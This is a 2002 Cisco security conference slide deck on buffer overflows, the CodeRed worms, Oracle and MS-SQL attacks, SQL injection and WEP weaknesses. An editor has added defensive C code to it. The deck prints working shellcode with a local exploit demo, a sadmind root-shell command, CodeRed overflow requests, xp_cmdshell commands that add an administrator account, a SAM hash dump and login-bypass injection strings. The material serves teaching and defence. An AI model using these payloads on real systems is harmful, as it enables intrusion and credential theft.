
(1) SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.

(3) Advanced Concepts in Security Threats
Session SEC-400

(4) What You Can Expect to Learn
• Inner workings of buffer overflows
    Local exploits
    Remote exploits
• Network worms
    How they propagate
    Historical examples
    Defenses

(5) What You Can Expect to Learn
• Database security issues
    Oracle/MS-SQL
    SQL Injection
• Wireless security
    Cracking vulnerable wireless installs
    Details about passive WEP cracking

(6) Goal of the Presentation
Understand the vulnerability, not the exploit.

(7) Exploits
• Lots of good exploits at:
    http://www.packetstormsecurity.com/
    http://securityfocus.com/
    http://lsd-pl.net/
    http://www.securiteam.com/exploits/archive.html

(8) Buffer Overflows

(9) Buffer Overflows
• What do buffer overflows have to do with “NETWORK” security? They are a vehicle an attacker can use to gain access to a system.
• “I don’t care about buffer overflows, I want to learn network security!”
Insecure Systems = Insecure Networks!

(10) What Is a Buffer Overflow
• A buffer overflow occurs when an object of size N+M is placed in a container of size N
• Usually occurs because of a lack of bounds checking in the program
• The consequence: the attacker can execute code of their own choosing

(11) Computer Memory Structure
[Diagram: process address space, highest address first]
    ENVIRON VARS
    STACK
    UNUSED VIRTUAL SPACE
    HEAP
    BSS
    DATA
    TEXT

(12) Computer Memory Structure: Procedures
[Diagram: the same layout, with a new procedure's frame pushed onto the stack]
    ENVIRON VARS
    STACK
    NEW PROCEDURE SPACE
    UNUSED VIRTUAL SPACE
    HEAP
    BSS
    DATA
    TEXT

(13) A Simple Program
    void function(int a, int b, int c)
    {
        char buffer1[5];
        char buffer2[10];
    }

    int main(void)
    {
        function(1, 2, 3);
        return 0;
    }

(14) Stack Operation
Caller (main), with the listing's line numbers:
    22    pushl %ebp
    23    movl  %esp,%ebp
    24    subl  $8,%esp
    25    addl  $-4,%esp
    26    pushl $3
    27    pushl $2
    28    pushl $1
    29    call  function
    30    addl  $16,%esp
Stack after the call, bottom of stack first: 3 | 2 | 1 | RET (return address, line 30) | top of stack

(15) Stack Operation
Callee prologue:
    8     function:
    9     pushl %ebp
    10    movl  %esp,%ebp
    11    subl  $20,%esp
Stack, bottom first: 3 | 2 | 1 | RET | saved %ebp | buffer space (20 bytes) | top of stack; %ebp now points at the saved %ebp slot.

(16) Stack Operation
Stack, bottom first: 3 | 2 | 1 | RET | saved %ebp | buffer1 | buffer2 | top of stack

(17) Buffer Overflow: Theory
[Diagram: the stack of slide 16 labelled with addresses from 0xFF (bottom of stack) down to 0xD8 (top of stack): 3 | 2 | 1 | RET | saved %ebp | buffer1 | buffer2. The overflow fills buffer2 and everything above it with “Our Code” and overwrites RET with 0xD8, the address of the buffer, so when function() returns it jumps into the injected code.]

(18) What Is ‘Our Code’?
• In most cases we want a shell
• What if there is no shell code in the program we’re exploiting? Write our own and inject it into the buffer

(19) Example Shell Code
    #include <stdio.h>
    #include <unistd.h>

    int main(void)
    {
        char *name[2];
        name[0] = "/bin/sh";
        name[1] = NULL;
        execve(name[0], name, NULL);
        return 0;
    }

(20) Our Shell Code in Assembler
    int main()
    {
        __asm__("
            jmp 0x26                  # 2 bytes
            popl %esi                 # 1 byte
            movl %esi,0x8(%esi)       # 3 bytes
            movb $0x0,0x7(%esi)       # 4 bytes
            movl $0x0,0xc(%esi)       # 7 bytes
            movl $0xb,%eax            # 5 bytes
            movl %esi,%ebx            # 2 bytes
            leal 0x8(%esi),%ecx       # 3 bytes
            leal 0xc(%esi),%edx       # 3 bytes
            int $0x80                 # 2 bytes
            movl $0x1, %eax           # 5 bytes
            movl $0x0, %ebx           # 5 bytes
            int $0x80                 # 2 bytes
            call -0x2b                # 5 bytes
            .string \"/bin/sh\"       # 8 bytes
        ");
    }

(21) Shell Code Egg
    char shellcode[] =
        "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
        "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
        "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
Notice the nulls.

(22) Shell Code Egg Cleaned Up
    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
• Nulls have been cleaned up
• Very compact shellcode
• Will work in character buffers

(23) A Simple Program: shellcode.c
    #include <string.h>

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    void function(int a, int b, int c)
    {
        char buffer1[5];
        char buffer2[10];
        strcpy(buffer2, shellcode);   /* better to use strncpy */
    }

    int main(void)
    {
        function(1, 2, 3);
        return 0;
    }

(24) Local Exploit in Action
    $ gcc -o shellcode shellcode.c
    $ ./shellcode
    sh-2.04$ exit
    exit
    $

(25) What about the Real World?
• Very simplistic local example
    Mechanics are the same for remote exploits
• Real-world remote exploit examples
    Solaris sadmind exploit for Solaris 2.6 and 7
    Microsoft Windows Internet Information Server (IIS) 5.0 Internet Printing Protocol (IPP) exploit

(26) Solaris sadmind Exploit
[Diagram: attacker to target. The attacker reaches sadmind through the RPC portmapper (port 111) and the sadmind service (TCP:32823); the injected command is "echo ingreslock stream tcp nowait root /bin/sh sh -i >> /tmp/bob; /usr/sbin/inetd -s /tmp/bob"; the attacker then connects to TCP:1524 (ingreslock) and receives /bin/sh -i.]

(27) IIS 5.0 Internet Printing Protocol Exploit
[Diagram: attacker to target TCP:80 with the request
    GET /NULL.printer HTTP/1.0
    Host: [buffer]
after the overflow, the target connects back to the attacker's netcat listener on TCP:6000.]

(28) Defenses
• As an administrator:
    Stay current with patches for your operating systems
    Minimize available services
    Non-executable stacks: not a general solution
• What about IDS?
    Network IDS can detect, but often not stop the attack
    Host IDS can detect the overflow attempt and prevent it
• As a programmer, perform diligent bounds checking and input validation
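
Added here as an example of the bounds checking the Defenses slide asks for (this is not code from the deck): the deck's function() from slide 23 rewritten with a checked copy, plus a probe showing why the slide's "better to use strncpy" comment is not the whole story. The helper names are the editor's assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Added example (not from the Cisco deck). The deck's function() copies
 * shellcode into char buffer2[10] with strcpy(), which never learns how
 * large buffer2 is, so anything past 9 bytes plus the NUL runs upward
 * into buffer1, the saved %ebp and the return address laid out on
 * slide 16. bounded_copy() is the bounds check the Defenses slide asks
 * for: the copy happens only if the whole string, terminator included,
 * fits. Returns 0 on success, -1 if the input was rejected (dst is then
 * the empty string). */
int bounded_copy(char *dst, size_t dstsize, const char *src)
{
    size_t n = strlen(src);
    if (dstsize == 0)
        return -1;
    if (n >= dstsize) {            /* no room for n bytes plus the NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);       /* copies the terminator too */
    return 0;
}

/* The deck's function(), rewritten so the copy is checked and the caller
 * learns whether the input was accepted. a, b, c and buffer1 are kept
 * only to match the stack layout the deck discusses; they are unused. */
int function(int a, int b, int c, const char *input)
{
    char buffer1[5];
    char buffer2[10];
    (void)a; (void)b; (void)c; (void)buffer1;
    return bounded_copy(buffer2, sizeof buffer2, input);
}

/* Caveat on the deck's "better to use strncpy" comment: strncpy() pads
 * short strings with NULs but writes no terminator at all when src has
 * dstsize or more bytes, leaving a string that later reads run off the
 * end of. This probe copies src into a scratch buffer with strncpy() and
 * reports whether a terminator ended up inside the first dstsize bytes:
 * 1 = terminated, 0 = not terminated, -1 = dstsize too large to probe. */
int strncpy_left_terminated(size_t dstsize, const char *src)
{
    char dst[64];
    if (dstsize > sizeof dst)
        return -1;
    memset(dst, 'X', sizeof dst);  /* no stray NULs to begin with */
    strncpy(dst, src, dstsize);
    return memchr(dst, '\0', dstsize) != NULL;
}
```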

(29) Worms

(30) Worms
“A worm is a program that can run by itself and can propagate a fully working version of itself to other machines.”
    “A Report on the Internet Worm”, Robert Page, University of Lowell, Nov. 7, 1988

(31) Worms
• Morris Worm
• CodeRed
• CodeRed v2
• CodeRed II

(32) The Morris Worm
• One of the first recorded worm infections of the Internet occurred on November 2, 1988
• Later known as the Morris Worm
• Attacks through three vectors:
    sendmail
    finger
    rsh/rexec

(33) CodeRed
• First appearance was mid-July 2001
• Spreads through Microsoft IIS web servers
    Targets the IIS .ida vulnerability
    The ISAPI (Internet Server Application Program Interface) .ida (indexing service) filter fails to perform adequate bounds checking on its input buffers

(34) CodeRed
• First group to do a detailed analysis of this worm was eEye Digital Security
    This group was also the one which identified and published the .ida vulnerability in June, 2001
    Termed the worm “CodeRed”

(35) CodeRed Logic Flow
[Flowchart, reconstructed from the slide's nodes]
    CodeRed Start
    → c:\notworm Present? Yes: Dormant. No: continue
    → 100 Threads Present? No: Spawn New Thread. Yes: 100th Worm Thread → Chinese or English? English: Deface Webpage
    → Is Date > 1 || < 19? Yes: Generate IP List → Search for and Infect Other Hosts
    → Is Date > 20 && < 28? Yes: DoS against www.whitehouse.gov
    → Is Date > 28? Yes: Dormant

(36) CodeRed Infection
• Infection process
    Selects IP address to attack
    Connects to the HTTP port and issues a GET request (one request line, 224 N's, wrapped here for display):
    GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0

(37) Initial CodeRed Exploit
• The GET request contains the necessary code to exploit the .ida vulnerability
• After the .ida exploit code is run, execution jumps into the worm code, which is held within the body of the initial HTTP request

(38) CodeRed Programming Errors
• Infection rate was limited due to an error in the generation of IP addresses
    Static seed used for the random number generator
    Each worm instance scanned the same IPs as other worm instances
• www1.whitehouse.gov IP address was used
    Simple solution: change the IP address of www1.whitehouse.gov
• Worm spread slowly, so it was not so destructive

(39) CodeRed v2
• Began to appear on July 19, 2001
• Spreads using the same .ida exploit as CRv1
• Uses a random seed
    Spread very fast
    341,000 machines infected in the first 24 hours

(40) CodeRed v2 Infection Progress: July 19, Midnight - 159 Hosts Infected

(41) CodeRed v2 Infection Progress: July 19, 11:40AM - 4,920 Hosts Infected

(42) CodeRed v2 Infection Progress: July 20, Midnight - 341,015 Hosts Infected

(43) CodeRed II
• Began to appear in early August 2001
• Spreads using the same .ida exploit as previous CodeRed worms

(44) CodeRed II
• Very similar attack vector to CodeRed (one request line, 224 X's, wrapped here for display):
    GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0

(45) CodeRed II Mechanics
• On initial access the worm determines if the host has already been infected
• If not previously infected, the worm initiates its propagation method and sets up a backdoor
• Goes dormant for one day
• Reboots the host
• CodeRed II was not memory resident
    Rebooting a machine did not get rid of the infection

(46) CodeRed II vs. CodeRed
• CodeRed II did not appear to have a “hack web page” functionality
• CodeRed II’s behavior was affected by whether the target system was a Chinese language-based system or not
    If the target was a Chinese language-based system then the number of threads spawned is 600 (versus 300 for non-Chinese language-based systems)
    System reboot occurs once every two days on Chinese language-based systems (once per day for others)
• CodeRed II also included a backdoor for the attacker
    c:\inetpub\scripts\root.exe (c:\winnt\system32\cmd.exe)

(47) CodeRed Defenses
• Apply Microsoft patch for .ida vulnerability
• Host Based IDS (HIDS)
• Don’t allow internal hosts to be directly connected to the Internet
• Keep virus detection software up to date
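
As an added example (not code from the deck or from eEye), a web-log check that recognizes the two .ida request shapes printed on slides 36 and 44 and tells them apart from ordinary indexing-service queries. The classification heuristic, the run-length threshold and the sample log lines are the editor's constructions.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the Cisco deck: a log check for the .ida
 * overflow requests shown on slides 36 and 44. The heuristic, the
 * run-length threshold and the sample log lines are the editor's. */

#define MIN_FILLER_RUN 64   /* the worms pad with 224 bytes; this is an assumed floor */

/* Classify one HTTP request or access-log line.
 *   0 = no .ida overflow attempt (ordinary /default.ida queries included)
 *   1 = CodeRed / CodeRed v2 shape: long run of 'N', then %u-encoded payload
 *   2 = CodeRed II shape: long run of 'X', then %u-encoded payload
 *   3 = /default.ida request with %u-encoded bytes but another filler
 *       (possible variant, worth a look) */
int classify_ida_request(const char *line)
{
    const char *q = strstr(line, "GET /default.ida?");
    if (q == NULL)
        return 0;
    q += strlen("GET /default.ida?");

    /* Both worms pad the query with one repeated byte up to the overflow
     * point; measure that run. */
    size_t run = 0;
    while (q[run] != '\0' && q[run] == q[0])
        run++;

    /* The worm body rides in IIS-specific %uXXXX escapes (slide 37). */
    if (strstr(q, "%u") == NULL)
        return 0;
    if (run >= MIN_FILLER_RUN && q[0] == 'N')
        return 1;
    if (run >= MIN_FILLER_RUN && q[0] == 'X')
        return 2;
    return 3;
}

/* Build a constructed Common Log Format line: source address, filler
 * byte and run length, followed by an abbreviated copy of the %u payload
 * head from slide 36. Returns the line length, or 0 if it does not fit. */
size_t build_ida_line(char *buf, size_t cap, const char *src_ip, char filler, size_t run)
{
    static const char head[] =
        "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801=a HTTP/1.0\" 200 -";
    int n = snprintf(buf, cap, "%s - - [19/Jul/2001:11:40:02 -0400] \"GET /default.ida?", src_ip);
    if (n < 0 || (size_t)n + run + sizeof head > cap)
        return 0;
    memset(buf + n, filler, run);
    memcpy(buf + n + run, head, sizeof head);   /* sizeof head includes the NUL */
    return (size_t)n + run + sizeof head - 1;
}

/* Class of a constructed probe with the given filler and a 224-byte run. */
int classify_constructed_probe(char filler)
{
    char buf[512];
    if (build_ida_line(buf, sizeof buf, "192.0.2.1", filler, 224) == 0)
        return -1;
    return classify_ida_request(buf);
}

/* Scan log lines; counts[c] receives the number of lines in class c.
 * Returns how many lines fell in classes 1-3. */
int scan_ida_log(const char *const *lines, size_t nlines, int counts[4])
{
    int hits = 0;
    memset(counts, 0, 4 * sizeof counts[0]);
    for (size_t i = 0; i < nlines; i++) {
        int c = classify_ida_request(lines[i]);
        counts[c]++;
        if (c != 0)
            hits++;
    }
    return hits;
}

/* Constructed four-line sample: two worm probes, one ordinary .ida
 * query, one unrelated request. Returns the flagged count (2). */
int demo_scan(void)
{
    char red[512], red2[512];
    build_ida_line(red, sizeof red, "10.0.0.5", 'N', 224);
    build_ida_line(red2, sizeof red2, "10.0.0.9", 'X', 224);
    const char *lines[] = {
        red,
        "10.0.0.7 - - [19/Jul/2001:11:41:00 -0400] \"GET /default.ida?q=budget HTTP/1.0\" 200 512",
        red2,
        "10.0.0.8 - - [19/Jul/2001:11:42:00 -0400] \"GET /index.html HTTP/1.0\" 200 1024",
    };
    int counts[4];
    return scan_ida_log(lines, 4, counts);
}
```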

(48) Database Security

(49) Database Hacking Topics
• Objectives
• Oracle
• MS-SQL
• SQL Injection

(50) Database Hacking Objectives
• Database users and passwords
    DBA access
• Get sensitive information from the db
    Usernames
    Passwords
    Credit card numbers
    Salary
• Use the DB to compromise the host
• DoS

(51) Finding Database Users
• Default users
• Scripts
    Web applications
    Maintenance scripts
• Production databases may be secure; development databases may be more lax
    More DBAs
    Copy of production data
    Database names may be similar
    Disaster recovery database

(52) Oracle Vulnerabilities
• Listens on tcp/1521 by default
• Transport by default has no encryption
• Default accounts
    SYS [change_on_install]
    SYSTEM [manager]
    Over 160 default database accounts
    11 default DBA accounts
• Unable to put lockout policy on default DBA accounts
• Stop listener (DoS)

(53) Oracle Vulnerabilities: lsnrctl
    $ lsnrctl
    LSNRCTL for Linux: Version 8.1.7.0.0 - Production on 19-MAR-2002 00:24:49
    (c) Copyright 1998 Oracle Corporation.  All rights reserved.
    Welcome to LSNRCTL, type "help" for information.
    LSNRCTL> status
    Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC0)))
    STATUS of the LISTENER
    ------------------------
    Alias                     LISTENER
    Version                   TNSLSNR for Linux: Version 8.1.7.0.0 - Production
    Start Date                08-MAR-2002 13:18:21
    Uptime                    10 days 11 hr. 6 min. 30 sec
    Trace Level               off
    Security                  ON
    SNMP                      OFF
    Listener Parameter File   /home/oracle/8.1.7/network/admin/listener.ora
    Listener Log File         /home/oracle/8.1.7/network/admin/listener.log
    Services Summary...
      acctng            has 3 service handler(s)
      cc_accts          has 3 service handler(s)
    The command completed successfully
    LSNRCTL> stop

(54) Oracle Vulnerabilities
• Packages provide access to helpful functions for hacking:
    UTL_FILE    Read/write local files on the db server
    UTL_SMTP    Send e-mail
    UTL_TCP     Outgoing TCP connections
    UTL_HTTP    Retrieve/post data via HTTP

(55) Oracle Vulnerabilities
• To execute programs on the database server:
    Requires Oracle username/password
    Requires ‘Create Library’ permission
    Requires configuration of external procedure calls on the server
    Requires knowledge of shared object libraries

(56) MS-SQL Vulnerabilities
• Listens on tcp/1433 and udp/1434 (by default)
    Can also use named pipes (NetBIOS) for transport
• Transport by default has no encryption
• Default DBA: sa [no password]
• Unable to put lockout policy on ‘sa’ account
• PW is stored in registry key:
    HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSSQLServer\SQLEW\Registered Server\SQL 6.5

(57) MS-SQL Vulnerabilities
• Buffer overflow in MS SQL 2000 Monitor port (1434 udp)
    0x04 – Stack Overflow (unsafe string copy)
    0x08 – Heap Overflow (0x08host:port)
    0x0A – DoS
[Diagram: two MSSQL servers bouncing the 0x0A message between each other]

(58) MS-SQL Vulnerabilities
• Stored procedures provide easy access to common (hacking) tasks:
    sp_databases    Lists the databases on the server
    sp_tables       Lists the tables within a database
    sp_columns      Lists columns in a table
    sp_adduser      Add a user to a database
    sp_help         Lists the stored procedures

(59) MS-SQL Vulnerabilities
• Executable procedures
    Provide methods to interface with the underlying OS
    These commands execute with ‘local system’ privilege
• xp_regread – Retrieves a registry key
• xp_cmdshell – Executes a system command
    xp_cmdshell ‘net user user password /ADD’
    xp_cmdshell ‘net localgroup /ADD Administrators user’

(60) MS-SQL Vulnerabilities
    linsql> dir \winnt\repair\sam._
    Executing [xp_cmdshell 'dir \winnt\repair\sam._']
     Volume in drive C is NT4W
     Volume Serial Number is EC10-1C48

     Directory of C:\winnt\repair

    01/11/02  12:41p                 4,141 sam._
                   1 File(s)          4,141 bytes
                                910,810,624 bytes free
    linsql> expand \winnt\repair\sam._ \temp\sam
    Executing [xp_cmdshell 'expand \winnt\repair\sam._ \temp\sam']
    Microsoft (R) File Expansion Utility  Version 2.50
    Copyright (C) Microsoft Corp 1990-1994.  All rights reserved.
    Expanding \winnt\repair\sam._ to \temp\sam.
    \winnt\repair\sam._: 4141 bytes expanded to 16384 bytes, 295% increase.
    linsql> \temp\samdump \temp\sam
    Executing [xp_cmdshell '\temp\samdump \temp\sam']
    Administrator:500:C09AC013E57A84C2DA1AB7ED930B9D71::Built-in account for administering the computer/domain::
    Guest:501:NO PASSWORD*********************::Built-in account for guest access to the computer/domain::
    linsql>

(61) MS-SQL Vulnerabilities
• Common attack tools:
    Sqlpoke.exe               Executes commands using xp_cmdshell
    linsql                    Connect to and hack MSSQL databases from Linux
    sqldict.exe, sqlbf.exe    Brute force MS-SQL user passwords
    FreeTDS and Perl DBI      Script attack scenarios in Perl under Unix

(62) SQL Injection
• A method of attacking database-driven web servers
    Insert specially constructed SQL commands as form elements or cookie data
    On the server, the elements are processed as SQL statements
• Commands are executed on the database server, often behind the firewall/DMZ

(63) Example of Expected Behavior
Login
    Username: auser
    Password: apassword
    select * from users where username='auser' and password='apassword';
• If any number of table rows are returned the user is successfully authenticated; otherwise, bad match on username and password

(64) Example of Hacked Behavior
Login
    Username: ' or username like '%
    Password: ' or 'a'='a
    select * from users where username='' or username like '%' and password='' or 'a'='a';
• Since the % wildcards would match on all username and password combinations, the login application would allow access

(65) Another Example of Hacked Behavior
Login
    Account #: 0 or 1=1
    Password: ' or password like '%
    select * from users where acctnum=0 or 1=1 and password='' or password like '%';
• When dealing with numeric data, we don’t have to worry about the quoting

(66) Other SQL Injection Issues
• When multiple rows are returned from a select, the first returned row often gets used
• This means we can gain not just access, but often Admin access! Database rows are not returned in any order.
• Other SQL commands can be inserted:
    ; exec xp_cmdshell "net user user pw /ADD"
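
Added example, not code from the deck: the input validation layer for the two login forms on slides 64 and 65. Parameterized statements (bind variables) are the primary fix, because the database then never parses form text as SQL; the checks here sit in front of that and show why "uses a number" is not the same as "validates a number". Function names and limits are the editor's assumptions.

```c
#include <ctype.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* Added example (not from the Cisco deck). The injected "0 or 1=1" on
 * slide 65 works because the application pastes the form field into the
 * WHERE clause as-is; no quoting is involved, so no quote handling can
 * save it. The durable fix is a parameterized statement (bind variables);
 * the checks below are the input validation from slide 28 that sits in
 * front of that. Names and limits are the editor's choices. */

/* Strict account-number parse: ASCII digits only, no sign, no spaces, no
 * trailing text, must fit in a long. Returns 1 and stores the value, or
 * 0 on rejection. atoi()/strtol() on their own stop at the first
 * non-digit and would turn "0 or 1=1" into a perfectly happy 0. */
int parse_acctnum(const char *field, long *out)
{
    if (field == NULL || *field == '\0')
        return 0;
    for (const char *p = field; *p != '\0'; p++)
        if (!isdigit((unsigned char)*p))
            return 0;
    errno = 0;
    char *end;
    long v = strtol(field, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return 0;
    *out = v;
    return 1;
}

/* Convenience wrapper: the parsed value, or -1 when the field is rejected. */
long acctnum_or_minus1(const char *field)
{
    long v;
    return parse_acctnum(field, &v) ? v : -1;
}

/* Allow-list check for a username field: 1..32 characters drawn from
 * letters, digits, '.', '_' and '-'. This rejects the quote and the '%'
 * wildcard in the slide 64 input (' or username like '%) before any SQL
 * is built. It is defence in depth, not a substitute for binding. */
int username_is_wellformed(const char *field)
{
    size_t len = strlen(field);
    if (len == 0 || len > 32)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)field[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-')
            return 0;
    }
    return 1;
}
```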

(67) Wireless Security

(68) Wireless Topics
• Weaknesses in authentication
• Weaknesses in encryption
• Weaknesses in management frames
• Man in the middle attacks

(69) Weaknesses in Authentication
• Service Set Identifier (SSID)
• Open Authentication
• MAC Address Authentication
• Shared Key Authentication

(70) The Service Set Identifier (SSID)
• Used to logically separate wireless LANs
• Often used as a “network password” but is actually broadcast in clear text
• Removal of SSID from beacons isn’t enough
[Diagram: overlapping cells advertising SSID Cisco and SSID Wireless]

(71) SSID for Authentication
[Screenshot]

(72) Open Authentication
• No authentication is necessary beyond knowledge of the SSID
• If WEP is enabled you must know the WEP key and SSID

(73) Wireless MAC Address Authentication
• Client authenticates
• Client requests association
• AP checks MAC against
    1. local allowed list
    2. forward to AAA server
• Accept association
[Diagram: Client (MAC address ABC) → AP → RADIUS. 1. Association Request; 2. Client MAC sent as RADIUS Request (PAP); 3. RADIUS Accept; 4. Association Response (Success)]

(74) Wireless MAC Address Authentication
• Weaknesses
    MAC addresses are sent in the clear
    MAC addresses can be sniffed and spoofed

(75) Shared Key Authentication Vulnerabilities
[Diagram: the Access Point sends a Plaintext Challenge to the Client, which returns a Ciphertext Response; an Attacker listening to both computes Plaintext Challenge XOR Ciphertext Response = Key Stream]
• Vulnerable to known plaintext attack
• Weaker than Open with WEP!

(76) Weaknesses in Encryption
• WEP (Wired Equivalent Privacy)
    RC4 IVs
    Inductive Key Derivation
        IV/WEP Key Replay
        Frame Bit Flipping

(77) 802.11 Wireless Encryption
• WEP (Wired Equivalent Privacy)
    Utilizes RC4 stream cipher and CRC32
    Static, pre-shared, 40 bit or 104 bit keys on client and access point, with 24 bit IV
    Very fast stream cipher
Cryptographic Usage Is Flawed

(78) What Is a Stream Cipher?
[Diagram: Key → Cipher → Key Stream; Key Stream XOR Plaintext → Ciphertext]
• Generates a key stream of a desired length from the key
• The key stream is mixed with the plaintext data
• The result is ciphertext data

(79) What Is an Initialization Vector?
• An initialization vector (IV) is a value that alters the key stream
• It augments the key to generate a new key stream
• The IV changes, keeping the key stream changing
[Diagram: IV + Key → Cipher → Key Stream 45678; Plaintext CISCO XOR Key Stream → Ciphertext WGSSF]

(80) WEP Data Frame Encrypted
[Frame layout: IV field, 32 bits (Initialization Vector 24 bits | Pad 6 bits | Key ID 2 bits) | Data, 0–18432 bits (max 18k) | ICV, 32 bits]
• 802.11 IVs are 24 bit integer values
• Augment 40 bit keys to 64 bits
• Augment 104 bit keys to 128 bits

(81) WEP Output
• Encrypted plaintext/ICV is encapsulated in the transmission frame
• Transmission frame contains the IV in plaintext
• Additional MAC layer headers are then added
• Frame transmitted

(82) WEP Weakness
• Occurs when part of the key presented to the KSA is exposed to the attacker
    When the same secret part of the key is used with numerous different exposed values, an attacker can derive the secret part by analyzing the initial word of the keystreams
• This is exactly how WEP works
    The secret part of the key is the key input by the user
    The “numerous different exposed values” is the IV
• We will focus on the second weakness

(83) Weak IVs
• Which IV values are considered “weak”?
• For 128-bit keys the first byte of the IV ranges from 3–16 (0x03–0x10)
• For 40-bit keys the first byte of the IV ranges from 3–8 (0x03–0x08)
[Diagram: the RC4 key as byte offsets; the IV occupies offsets 0–2 and the Secret Key follows, 128 bits in total for the long key and 64 bits for the short one]

(84) Weak IVs
• Second weak IV byte must be set to FF
• Third weak IV byte can be any value
• For every weak initial byte of the key there are 256 weak IVs
• Examples of weak IVs: 03:FF:A0, 10:FF:05, 0C:FF:0C
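
An added example (not code from the deck or from AirSnort) that classifies captured IVs against the Fluhrer-Mantin-Shamir weak form (B+3, 0xFF, x), where B is the index of the secret-key byte the IV leaks about; that form gives first bytes 3..15 for a 13-byte (104-bit) key and 3..7 for a 5-byte (40-bit) key, one less than the 3–16 and 3–8 quoted on slide 83. The function names are the editor's; the sample IVs are the ones printed on slide 87.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the Cisco deck: classify captured WEP IVs
 * against the Fluhrer-Mantin-Shamir weak form (B+3, 0xFF, x), where B is
 * the index of the secret-key byte the IV leaks about. For a 13-byte
 * (104-bit) secret key the weak first byte is 3..15, for a 5-byte
 * (40-bit) key 3..7; slide 83 quotes 3-16 and 3-8. Function names are
 * the editor's; the sample IVs are those printed on slide 87. */

/* Parse "03:FF:A0" style text into three bytes; 1 on success, 0 otherwise. */
int parse_iv(const char *text, unsigned char iv[3])
{
    unsigned int a, b, c;
    char tail;
    if (sscanf(text, "%2x:%2x:%2x%c", &a, &b, &c, &tail) != 3)
        return 0;
    iv[0] = (unsigned char)a;
    iv[1] = (unsigned char)b;
    iv[2] = (unsigned char)c;
    return 1;
}

/* Index of the secret-key byte an FMS-weak IV exposes, or -1 when the IV
 * is not of the weak form for a secret key of key_bytes bytes. */
int weak_iv_key_byte(const unsigned char iv[3], int key_bytes)
{
    if (iv[1] != 0xFF)
        return -1;
    if (iv[0] < 3 || iv[0] >= 3 + key_bytes)
        return -1;
    return iv[0] - 3;
}

/* Same check on textual input; -2 if the text does not parse. */
int weak_iv_text(const char *text, int key_bytes)
{
    unsigned char iv[3];
    if (!parse_iv(text, iv))
        return -2;
    return weak_iv_key_byte(iv, key_bytes);
}

/* Audit n IVs (3 bytes each, packed back to back) seen on the air.
 * per_byte[B] receives how many weak IVs were observed for secret-key
 * byte B (the caller supplies key_bytes entries); the return value is
 * the total. Firmware with weak-IV avoidance never transmits these IVs,
 * so on such a network the total stays at zero. */
int audit_weak_ivs(const unsigned char *ivs, size_t n, int key_bytes, int *per_byte)
{
    int total = 0;
    memset(per_byte, 0, (size_t)key_bytes * sizeof per_byte[0]);
    for (size_t i = 0; i < n; i++) {
        int b = weak_iv_key_byte(ivs + 3 * i, key_bytes);
        if (b >= 0) {
            per_byte[b]++;
            total++;
        }
    }
    return total;
}

/* The IV column from slide 87, audited as a 104-bit key. Returns the
 * weak-IV total: 2, the two 03:FF:FF frames (10:FF:01 lies outside 3..15). */
int demo_audit(void)
{
    static const char *seen[] = {
        "00:4A:90", "03:FF:FF", "04:AB:02", "10:FF:01", "03:FF:FF", "10:FF:01"
    };
    unsigned char ivs[6][3];
    int per_byte[13];
    for (size_t i = 0; i < 6; i++)
        if (!parse_iv(seen[i], ivs[i]))
            return -1;
    return audit_weak_ivs(ivs[0], 6, 13, per_byte);
}
```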

(85) The Attack
• For FMS to work the attacker must be able to capture the first word of the RC4 output for each IV
• Capture enough packets per IV and the attacker can statistically determine the value of the key byte related to that IV

(86) Wireless Security
• Fluhrer, Mantin and Shamir is practical for any key size
